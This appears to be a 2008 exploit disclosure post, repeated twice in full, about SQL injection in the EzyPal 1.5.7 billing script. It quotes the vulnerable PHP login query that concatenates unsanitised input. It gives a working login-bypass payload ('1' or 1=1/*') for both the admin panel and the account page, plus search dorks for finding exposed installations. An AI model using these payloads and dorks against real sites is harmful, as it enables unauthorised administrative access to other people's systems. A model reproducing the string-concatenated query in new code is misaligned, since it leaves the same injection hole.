~!DoK_tOR!~
17.08.2008, 19:10
Author: ~!Dok_tOR!~
Product: EzyPal
Version: 1.5.7 возможно и более ранние версии
URL: www.ezypal.com
Vulnerability Class: SQL injection
1.
/[installdir]/admincp/index.php
Vuln Code:
$sql = mysql_query("SELECT customer_email FROM ".$config['db_pref']."customers WHERE customer_email = '".$customer_email."' AND customer_password = '".md5($customer_pass)."' AND customer_level = 2") or ErrorDB(2,mysql_errno(),mysql_error());
magic_quotes_gpc = Off
Example:
http://[server]/[installdir]/admincp/index.php
Email Address: 1' or 1=1/*
Password: 1' or 1=1/*
2.
Example:
http://[server]/[installdir]/index.php?do=account
Email Address: 1' or 1=1/*
Password: 1' or 1=1/*
Dork:
Powered by EzyPal
Welcome :: EzyPal
Product: EzyPal
Version: 1.5.7 возможно и более ранние версии
URL: www.ezypal.com
Vulnerability Class: SQL injection
1.
/[installdir]/admincp/index.php
Vuln Code:
$sql = mysql_query("SELECT customer_email FROM ".$config['db_pref']."customers WHERE customer_email = '".$customer_email."' AND customer_password = '".md5($customer_pass)."' AND customer_level = 2") or ErrorDB(2,mysql_errno(),mysql_error());
magic_quotes_gpc = Off
Example:
http://[server]/[installdir]/admincp/index.php
Email Address: 1' or 1=1/*
Password: 1' or 1=1/*
2.
Example:
http://[server]/[installdir]/index.php?do=account
Email Address: 1' or 1=1/*
Password: 1' or 1=1/*
Dork:
Powered by EzyPal
Welcome :: EzyPal